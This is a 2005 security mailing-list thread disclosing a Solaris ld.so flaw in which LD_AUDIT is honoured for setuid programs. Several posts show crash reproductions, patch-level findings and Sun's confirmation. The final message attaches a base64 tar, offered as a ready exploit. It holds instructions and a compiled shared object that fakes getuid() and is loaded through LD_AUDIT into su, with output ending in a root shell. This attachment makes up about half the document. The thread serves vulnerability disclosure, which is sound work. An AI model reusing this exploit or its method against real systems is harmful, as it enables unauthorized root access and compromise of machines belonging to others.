Przemyslaw Frasunek wrote:
> ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when
> running s[ug]id binaries, allowing to run arbitrary code with elevated
> privileges. Well, I can't belive, that such trivial vulnerability exists in
> modern OS...
[...]

Oh, well, it's not the end of fun with ldso.

atari:venglin:~> setenv LD_AUDIT :
atari:venglin:~> su
Segmentation fault
atari:venglin:~> unsetenv LD_AUDIT
atari:venglin:~> setenv LD_AUDIT `perl -e 'print "A"x1024'`
atari:venglin:~> su
ld.so.1: su: warning: su:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
path name too long
ld.so.1: su: warning:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
audit initialization failure: disabled
Segmentation fault


Both of segfaults are NULL pointer dereferences. The first example works on
Solaris 8, 9 and 10. Second one - only on Solaris 10. For now, it doesn't
seem to be exploitable.


--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

Przemyslaw Frasunek wrote:
> - SunOS 5.10 Generic i86pc i386 i86pc
> - SunOS 5.9 Generic_112233-12 sun4u

This vulnerability was introduced by one of the recent patches for Solaris 9,
possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
definitly makes ld.so exploitable.

Up-to-date Solaris 8 boxes are also vulnerable. Solaris 10 boxes are
vulnerable, both patched and unpatched.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

On Tue, Jun 28, 2005 at 06:17:02PM +0200, Przemyslaw Frasunek wrote:
> This vulnerability was introduced by one of the recent patches for Solaris 9,
> possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does
> not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16
> definitly makes ld.so exploitable.

Just patchrm-ed 112963-19 to -12, it is not working anymore.

p.

--
Beware of he who would deny you access to information, for in his
heart he dreams himself your master. -- Commissioner Pravin Lal
http://nerdquiz.sgh.waw.pl/ -- polska wersja quizu dla nerdów ;)

Vulnerability was confirmed by Sun:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

There are still no patches available, but workaround was proposed.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

=20
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I did the same. Patchrm-ed 112963-19 to -12. It still works for me.

Uname -a :

SunOS cf-node000 5.9 Generic_118558-09 sun4u sparc SUNW,Ultra-1

- --
- - Charlie
=20
5A27 58D2 C791 8769 D4A4 F316 7BF8 D1F6 4829 EDCF
=20
=20
=20

> -----Original Message-----
> From: full-disclosure-bounces@lists.grok.org.uk=20
> [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf=20
> Of Piotr KUCHARSKI
> Sent: Tuesday, June 28, 2005 10:49 AM
> To: Przemyslaw Frasunek
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: Re: [Full-disclosure] Solaris 9/10 ld.so fun
>=20
> On Tue, Jun 28, 2005 at 06:17:02PM +0200, Przemyslaw Frasunek
> wrote:=20
> > This vulnerability was introduced by one of the recent=20
> patches for Solaris 9,
> > possibly 112963. Ld.so patched with 112963-08 is not=20
> vulnerable -- it does
> > not allow LD_AUDIT for set[ug]id binaries, but upgrading to=20
> 112963-16
> > definitly makes ld.so exploitable.
>=20
> Just patchrm-ed 112963-19 to -12, it is not working anymore.
>=20
> p.
>=20
> --=20
> Beware of he who would deny you access to information, for in his
> heart he dreams himself your master. -- Commissioner Pravin Lal
> http://nerdquiz.sgh.waw.pl/ -- polska wersja quizu dla nerd=F3w ;)
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQsHll3v40fZIKe3PEQJzqACdEeusRDtTHQUjoZR0UR4MGl 5LFccAnA+y
XW7ELeMG8WK7klz/86f83scB
=3D/+QX
-----END PGP SIGNATURE-----

>I did the same. Patchrm-ed 112963-19 to -12. It still works for me.
>
>Uname -a :
>
>SunOS cf-node000 5.9 Generic_118558-09 sun4u sparc SUNW,Ultra-1


Please verify the md5 checksums of the resulting ld.so binaries
with the Solaris fingerprint database so you are certain exactly which
version you are using.

This is what I have on file:

a684091a9d09a44bbbbd48480cf9ea6c /usr/lib/ld.so.1 SUNWcsu;sparc;11.9.0,REV=2002.04.06.15.27;112963-12


Casper

This is a multi-part message in MIME format.
--------------030107080809040503080204
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Przemyslaw Frasunek wrote:

>Vulnerability was confirmed by Sun:
>
>http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
>
>There are still no patches available, but workaround was proposed.
>
>
>

Here is an exploit for Schillix using venglin's mojo.
-KF


--------------030107080809040503080204
Content-Type: application/octet-stream;
name="Schily-Root.tar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Schily-Root.tar"

U2NoaWxsaXgudHh0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAADAwMDA2NDQA
MDAwMTc1MAAwMDAxNzUwADAwMDAwMDAzNjQxADEwMjYxNjMwMT MzADAxNjI3MQAgMAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAB1c3RhciAgAGtmaW5p
c3RlcnJlAAAAAAAAAAAAAAAAAAAAAAAAAAAAa2ZpbmlzdGVycm UAAAAAAAAAAAAAAAAAAAAA
AAAAAAAwMDAwMDAwADAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTY2hpbGxpWCBpcy BhbiBPcGVuU29sYXJpcyBi
YXNlZCBkaXN0cmlidXRpb24gd2hpY2ggcnVucyBmcm9tIENEIG FuZCBjb3VsZCBiZSBpbnN0
YWxsZWQgb24geW91ciAKaGFyZGRpc2sgb3Igb250byBhbiBVU0 IgbWVtb3J5IHN0aWNrLgoK
aHR0cDovL3NjaGlsbGl4LmJlcmxpb3MuZGUvIAoKClRoaXMgaX MgYW4gZXhwbG9pdCBiaW5h
cnkgZm9yIFNjaGlsbGl4IGJhc2VkIDEwMCUgb24gaW5mb3JtYX Rpb24gZnJvbSAKdmVuZ2xp
blthdF1mcmVlYnNkW2RvdF1sdWJsaW5bZG90XXBsCgpodHRwOi 8vd3d3LnNlY3VyaXR5Zm9j
dXMuY29tL2FyY2hpdmUvMS80MDM1NzQvMzAvMC90aHJlYWRlZA oKSSBvbmx5IHNwZW50IGFi
b3V0IDIgbWludXRlcyBjb21waWxpbmcgdGhpcyBhbmQgSSBjZX J0YWlubHkgZGlkIG5vdCBp
bnZlc3QgYW55IAp0aW1lIGluIGZpbmRpbmcgdGhlIGV4cGxvaX QuIAoKRmlyc3QgeW91IG5l
ZWQgdG8gY29tcGlsZSBhIHNoYXJlZCBvYmplY3QgdG8gdXNlIG FzIGEgZ2V0dWlkKCkgcmVw
bGFjZW1lbnQuIAoKVW5sZXNzIHlvdSBhbHJlYWR5IGhhdmUgcm 9vdCBvbiBhIFNjaGlsbGl4
IGJveCB0aGlzIHBhcnQgd2lsbCBub3QgYmUgcG9zc2libGUuIE hlbmNlIHdoeSAKSSBoYXZl
IHByb3ZpZGVkIFNjaGlseS1Sb290LnNvIGluIHRoaXMgLnRhci BmaWxlLiAKCkxhc3QgbG9n
aW46IFNhdCBKdWwgIDIgMTY6Mzg6MzUgMjAwNQpTdW4gTWljcm 9zeXN0ZW1zIEluYy4gICBT
dW5PUyA1LjExICAgICAgc2NoaWx5MTcgICAgICAgIEp1bi4gMT csIDIwMDUKU3VuT1MgSW50
ZXJuYWwgRGV2ZWxvcG1lbnQ6ICBqZXMgMjAwNS0wNi0xNyBbc2 NoaWx5MTddCiMgbWtkaXIg
L29wdC9nY2MtMy40LjMKIyBtb3VudCAtRiBsb2ZzIC1PIC8uY2 Ryb20vb3B0L2djYy0zLjQu
MyAvb3B0L2djYy0zLjQuMwojIFBBVEg9JFBBVEg6L3Vzci9zcH MvYmluOi91c3Ivc2Z3L2Jp
bjovdXNyL2Njcy9iaW4KIyBleHBvcnQgUEFUSAojIGNhdCA+IC 90bXAvU2NoaWx5LVJvb3Qu
YwppbnQgZ2V0dWlkKCkKewpyZXR1cm4gMDsKfQoKXkMKIyBnY2 MgLWZQSUMgLXNoYXJlZCAt
byAvdG1wL1NjaGlseS1Sb290LnNvIC90bXAvU2NoaWx5LVJvb3 QuYwoKTW92ZSB5b3VyIHNo
YXJlZCBvYmplY3QgdG8gdGhlIG1hY2hpbmUgeW91IHdpc2ggdG 8gZXhwbG9pdC4uLiAKCmtm
aW5pc3RlcnJlQGFuaW1vc2l0eTp+JCBzY3AgU2NoaWx5LVJvb3 Quc28gc2NoaWxsaXhAMTky
LjE2OC4xLjIwNzovdG1wL1NjaGlseS1Sb290LnNvClNjaGlseS 1Sb290LnNvICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAxMDAlIDQ3MTYgICAgID QuNktCL3MgICAwMDowMAoK
VGFrZSByb290LiAKCmtmaW5pc3RlcnJlQGFuaW1vc2l0eTp+JC Bzc2ggLWwgc2NoaWxsaXgg
MTkyLjE2OC4xLjIwNwpMYXN0IGxvZ2luOiBTYXQgSnVsICAyID E2OjQ0OjE2IDIwMDUgZnJv
bSAxOTIuMTY4LjEuMjAyClN1biBNaWNyb3N5c3RlbXMgSW5jLi AgIFN1bk9TIDUuMTEgICAg
ICBzY2hpbHkxNyAgICAgICAgSnVuLiAxNywgMjAwNQpTdW5PUy BJbnRlcm5hbCBEZXZlbG9w
bWVudDogIGplcyAyMDA1LTA2LTE3IFtzY2hpbHkxN10KLWJhc2 gtMy4wMCQgZXhwb3J0IExE
X0FVRElUPS90bXAvU2NoaWx5LVJvb3Quc28KLWJhc2gtMy4wMC Qgc3UgLQpsZC5zby4xOiBz
dTogd2FybmluZzogbGliZ2NjX3Muc28uMTogb3BlbiBmYWlsZW Q6IE5vIHN1Y2ggZmlsZSBv
ciBkaXJlY3RvcnkKbGQuc28uMTogc3U6IHdhcm5pbmc6IC90bX AvU2NoaWx5LVJvb3Quc286
IGF1ZGl0IGluaXRpYWxpemF0aW9uIGZhaWx1cmU6IGRpc2FibG VkClN1biBNaWNyb3N5c3Rl
bXMgSW5jLiAgIFN1bk9TIDUuMTEgICAgICBzY2hpbHkxNyAgIC AgICAgSnVuLiAxNywgMjAw
NQpTdW5PUyBJbnRlcm5hbCBEZXZlbG9wbWVudDogIGplcyAyMD A1LTA2LTE3IFtzY2hpbHkx
N10KIyBpZAp1aWQ9MChyb290KSBnaWQ9MChyb290KQoKCgoAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAFNjaGlseS1Sb290LnNvAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAwMDAwNzU1ADAwMDE3NTAAMDAwMTc1MA AwMDAwMDAxMTE1NAAxMDI2
MTYyNzA1NgAwMTY1MDMAIDAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAdXN0YXIgIABrZmluaXN0ZXJyZQAAAAAAAAAAAA AAAAAAAAAAAAAAAGtmaW5p
c3RlcnJlAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDAwMDAwMAAwMD AwMDAwAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAf0VMRgEB
AQAAAAAAAAAAAAMAAwABAAAAlAAAADQAAABcDgAAAAAAADQAIA ADACgAGgAZAAEAAAAAAAAA
AAAAAAAAAADMBAAAzAQAAAUAAAAAAAEAAQAAAMwEAADMBAEAAA AAAAQBAAAgAQAABwAAAAAA
AQACAAAA8AQAAPAEAQAAAAAAwAAAAAAAAAAHAAAAAAAAABEAAA APAAAAAAAAAAEAAAAEAAAA
BQAAAAcAAAAAAAAAAAAAAAkAAAAKAAAACwAAAAAAAAAMAAAAAA AAAA0AAAAAAAAAAAAAAAAA
AAAAAAAAAgAAAAMAAAAAAAAAAAAAAAYAAAAAAAAACAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
DgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAFADAAAAAAAAEQ AIABsAAAAAAAAAAAAAACIA
AAA3AAAA0AUBAAAAAAARABQAPgAAAMwEAQAAAAAAEQANAFQAAA AAAAAAAAAAACAAAABoAAAA
AAAAAAAAAAAiAAAAhgAAAPAEAQAAAAAAEQAOAI8AAADMBAAAAA AAABEADACWAAAAyAQAAAQA
AAARAAwAowAAALAEAAAYAAAAEgALAKkAAACQBAAAHQAAABIACg CvAAAAUAQAAAoAAAASAAkA
tgAAAOwFAQAAAAAAEQAVALsAAACwBQEAAAAAABEADwAAX1BST0 NFRFVSRV9MSU5LQUdFX1RB
QkxFXwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm9fYmFzZXMAX2VkYX RhAF9HTE9CQUxfT0ZGU0VU
X1RBQkxFXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZGVyZWdpc3 Rlcl9mcmFtZV9pbmZvX2Jh
c2VzAF9EWU5BTUlDAF9ldGV4dABfbGliX3ZlcnNpb24AX2Zpbm kAX2luaXQAZ2V0dWlkAF9l
bmQAX19kc29faGFuZGxlAGxpYmdjY19zLnNvLjEAR0NDXzMuMA AvdXNyL3Nmdy9saWIAAAEA
AQDIAAAAEAAAAAAAAABQJnkLAAAAANYAAAAAAAAA2AQBAAYGAA DgBAEABgIAAOgEAQAGBQAA
zAUBAAgAAADcBAEABwYAAOQEAQAHAgAA7AQBAAcFAAD/swQAAAD/owgAAAAAAAAA/6MQAAAA
aAAAAADp4P////+jGAAAAGgIAAAA6dD/////oyAAAABoEAAAAOnA////VYnlU+gAAAAAW4HD
MwEBAFKAuwQBAAAAdA3rOoPABImDAAEAAP/Si4MAAQAAixCF0nXpi4MMAAAAhcB0EoPsDI2D
+AAAAFDohP///4PEEMaDBAEAAAGLXfzJw5BVieVT6AAAAABbgcPXAAEAUIuDFAA AAIXAdBlT
agCNgwgBAABQjYP4AAAAUOhT////g8QQi4P8AAAAhcB0HouLHAAAAIXJdBSD7AyNg/wAAABQ
6D3///+DxBCJ9otd/MnDAAAAVYnluAAAAADJwwAAVYnlVlPoAAAAAFuBw2YAAQCNg+w AAACN
cPyLQPzrCJCD7gT/0IsGg/j/dfRbXsnDAAAAAFWL7FPoAAAAAFuBwzMAAQDoR////+iy////
W8nDAAAAVYvsU+gAAAAAW4HDEwABAOjL/v//W8nDAQAAAPAEAQAAAAAAAAAAAAAAAABmAwAA
AAAAAHYDAAAAAAAAhgMAAAEAAADIAAAADAAAAJAEAAANAAAAsA QAAB0AAADeAAAADwAAAN4A
AAAEAAAAlAAAAAUAAAAMAgAACgAAAOsAAAAGAAAAHAEAAAsAAA AQAAAA+P3/b+j8AAD+//9v
+AIAAP///28BAAAAAgAAABgAAAAUAAAAEQAAABcAAAA4AwAAEQAAABgDAAA SAAAAOAAAABMA
AAAIAAAA/P3/bwEAAAAeAAAAAAAAAPv//28AAAAAAwAAAMwEAQAAAAAAAAAAAAAAAAD/////
AAAAAP////8AAAAAAAAAAAAAAADABQEAAAAAAAAAAAAAAAAAAAAAAAEAAAAA AAAAAAAAAAQA
8f8AAAAAlAAAAAAAAAADAAEAAAAAABwBAAAAAAAAAwACAAAAAA AMAgAAAAAAAAMAAwAAAAAA
+AIAAAAAAAADAAQAAAAAABgDAAAAAAAAAwAFAAAAAAAwAwAAAA AAAAMABgAAAAAAOAMAAAAA
AAADAAcAAAAAAFADAAAAAAAAAwAIAAAAAACQAwAAAAAAAAMACQ AAAAAAkAQAAAAAAAADAAoA
AAAAALAEAAAAAAAAAwALAAAAAADIBAAAAAAAAAMADAAAAAAAzA QBAAAAAAADAA0AAAAAAPAE
AQAAAAAAAwAOAAAAAACwBQEAAAAAAAMADwAAAAAAtAUBAAAAAA ADABAAAAAAALwFAQAAAAAA
AwARAAAAAADEBQEAAAAAAAMAEgAAAAAAyAUBAAAAAAADABMAAA AAAMwFAQAAAAAAAwAUAAAA
AADQBQEAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAAAAAAAAAA AAAAAAAwAXAAAAAAAAAAAA
AAAAAAMAGAAAAAAAAAAAAAAAAAADABkACQEAAOwFAQAAAAAAAQ AVAA8BAAAAAAAAAAAAAAEA
AQAVAAAAAAAAAAAAAAAEAPH/HAAAAAAAAAAAAAAABADx/ygAAAAAAAAAAAAAAAQA8f8zAAAA
tAUBAAAAAAABABAAQQAAALwFAQAAAAAAAQARAE8AAADEBQEAAA AAAAEAEgBiAAAAyAUBAAAA
AAABABMAbwAAAMwFAQAAAAAAAQAUAHMAAADQBQEAAQAAAAEAFQ B/AAAAkAMAAAAAAAACAAkA
lQAAANQFAQAYAAAAAQAVAJ4AAADsAwAAAAAAAAIACQCqAAAAAA AAAAAAAAAEAPH/KAAAAAAA
AAAAAAAABADx/7gAAAC4BQEAAAAAAAEAEADFAAAAwAUBAAAAAAABABEA0gAAAMQ FAQAAAAAA
AQASAOAAAADIBQEAAAAAAAEAEwDsAAAAXAQAAAAAAAACAAkAAg EAAAAAAAAAAAAABADx/xcB
AABQAwAAAAAAABEACAAxAQAAAAAAAAAAAAAiAAAATQEAANAFAQ AAAAAAEQAUAFQBAADMBAEA
AAAAABEADQBqAQAAAAAAAAAAAAAgAAAAfgEAAAAAAAAAAAAAIg AAAJwBAADwBAEAAAAAABEA
DgClAQAAzAQAAAAAAAARAAwArAEAAMgEAAAEAAAAEQAMALkBAA CwBAAAGAAAABIACwC/AQAA
kAQAAB0AAAASAAoAxQEAAFAEAAAKAAAAEgAJAMwBAADsBQEAAA AAABEAFQDRAQAAsAUBAAAA
AAARAA8AAC90bXAvU2NoaWx5LVJvb3Quc28AY3J0aS5zAHZhbH Vlcy1YYS5jAGNydHN0dWZm
LmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fRUhfRl JBTUVfQkVHSU5fXwBfX0pD
Ul9MSVNUX18AcC4wAGNvbXBsZXRlZC4xAF9fZG9fZ2xvYmFsX2 R0b3JzX2F1eABvYmplY3Qu
MgBmcmFtZV9kdW1teQBTY2hpbHktUm9vdC5jAF9fQ1RPUl9FTk RfXwBfX0RUT1JfRU5EX18A
X19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF 9jdG9yc19hdXgAY3J0bi5z
AF9FTkRfAF9TVEFSVF8AX1BST0NFRFVSRV9MSU5LQUdFX1RBQk xFXwBfX3JlZ2lzdGVyX2Zy
YW1lX2luZm9fYmFzZXMAX2VkYXRhAF9HTE9CQUxfT0ZGU0VUX1 RBQkxFXwBfSnZfUmVnaXN0
ZXJDbGFzc2VzAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZvX2Jhc2 VzAF9EWU5BTUlDAF9ldGV4
dABfbGliX3ZlcnNpb24AX2ZpbmkAX2luaXQAZ2V0dWlkAF9lbm QAX19kc29faGFuZGxlAABA
KCMpU3VuT1MgNS4xMSBzY2hpbHkxNyBPY3RvYmVyIDIwMDcAQC gjKVN1bk9TIEludGVybmFs
IERldmVsb3BtZW50OiAgamVzIDIwMDUtMDYtMTcgW3NjaGlseT E3XQAAQCgjKVN1bk9TIDUu
MTEgc2NoaWx5MTcgT2N0b2JlciAyMDA3AEAoIylTdW5PUyBJbn Rlcm5hbCBEZXZlbG9wbWVu
dDogIGplcyAyMDA1LTA2LTE3IFtzY2hpbHkxN10AAEdDQzogKE dOVSkgMy40LjMgKGNzbC1z
b2wyMTAtM180LWJyYW5jaCtzb2xfcnBhdGgpAABHQ0M6IChHTl UpIDMuNC4zIChjc2wtc29s
MjEwLTNfNC1icmFuY2grc29sX3JwYXRoKQAAR0NDOiAoR05VKS AzLjQuMyAoY3NsLXNvbDIx
MC0zXzQtYnJhbmNoK3NvbF9ycGF0aCkAAEAoIylTdW5PUyA1Lj ExIHNjaGlseTE3IE9jdG9i
ZXIgMjAwNwBAKCMpU3VuT1MgSW50ZXJuYWwgRGV2ZWxvcG1lbn Q6ICBqZXMgMjAwNS0wNi0x
NyBbc2NoaWx5MTddAGxkOiBTb2Z0d2FyZSBHZW5lcmF0aW9uIF V0aWxpdGllcyAtIFNvbGFy
aXMgTGluayBFZGl0b3JzOiA1LjExLTEuNDk2AAAuaGFzaAAuZH luc3ltAC5keW5zdHIALlNV
TldfdmVyc2lvbgAucmVsLmdvdAAucmVsLmRhdGEucmVsLmxvY2 FsAC5yZWwucGx0AC50ZXh0
AC5pbml0AC5maW5pAC5yb2RhdGEALmR5bmFtaWMALmRhdGEALm N0b3JzAC5kdG9ycwAuZWhf
ZnJhbWUALmpjcgAuYnNzAC5zeW10YWIALnN0cnRhYgAuY29tbW VudAAuc2hzdHJ0YWIAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ABAAAABQAAAAIAAACUAAAA
lAAAAIgAAAACAAAAAAAAAAQAAAAEAAAABwAAAAsAAAACAAAAHA EAABwBAADwAAAAAwAAAAEA
AAAEAAAAEAAAAA8AAAADAAAAIgAAAAwCAAAMAgAA6wAAAAAAAA AAAAAAAQAAAAAAAAAXAAAA
/v//bwIAAAD4AgAA+AIAACAAAAADAAAAAQAAAAQAAAAAAAAAJQAAAA kAAABCAAAAGAMAABgD
AAAYAAAAAgAAAA0AAAAEAAAACAAAAC4AAAAJAAAAQgAAADADAA AwAwAACAAAAAIAAAAUAAAA
BAAAAAgAAABCAAAACQAAAEIAAAA4AwAAOAMAABgAAAACAAAACA AAAAQAAAAIAAAARgAAAAEA
AAAGAAAAUAMAAFADAABAAAAAAAAAAAAAAAAEAAAAEAAAAEsAAA ABAAAABgAAAJADAACQAwAA
/AAAAAAAAAAAAAAABAAAAAAAAABRAAAAAQAAAAYAAACQBAAAkAQ AAB0AAAAAAAAAAAAAABAA
AAAAAAAAVwAAAAEAAAAGAAAAsAQAALAEAAAYAAAAAAAAAAAAAA AQAAAAAAAAAF0AAAABAAAA
AgAAAMgEAADIBAAABAAAAAAAAAAAAAAABAAAAAAAAAApAAAAAQ AAAAMAAADMBAEAzAQAACQA
AAAAAAAAAAAAAAQAAAAEAAAAZQAAAAYAAAADAAAA8AQBAPAEAA DAAAAAAwAAAAAAAAAEAAAA
CAAAAG4AAAABAAAAAwAAALAFAQCwBQAABAAAAAAAAAAAAAAABA AAAAAAAAB0AAAAAQAAAAMA
AAC0BQEAtAUAAAgAAAAAAAAAAAAAAAQAAAAAAAAAewAAAAEAAA ADAAAAvAUBALwFAAAIAAAA
AAAAAAAAAAAEAAAAAAAAAIIAAAABAAAAAwAAAMQFAQDEBQAABA AAAAAAAAAAAAAABAAAAAAA
AACMAAAAAQAAAAMAAADIBQEAyAUAAAQAAAAAAAAAAAAAAAQAAA AAAAAAMgAAAAEAAAADAAAA
zAUBAMwFAAAEAAAAAAAAAAAAAAAEAAAAAAAAAJEAAAAIAAAAAw AAANAFAQDQBQAAHAAAAAAA
AAAAAAAABAAAAAAAAACWAAAAAgAAAAAAAAAAAAAA0AUAAPADAA AXAAAAMQAAAAQAAAAQAAAA
ngAAAAMAAAAgAAAAAAAAAMAJAADeAQAAAAAAAAAAAAABAAAAAA AAAKYAAAABAAAAAAAAAAAA
AACeCwAABAIAAAAAAAAAAAAAAQAAAAAAAACvAAAAAwAAACAAAA AAAAAAog0AALkAAAAAAAAA
AAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
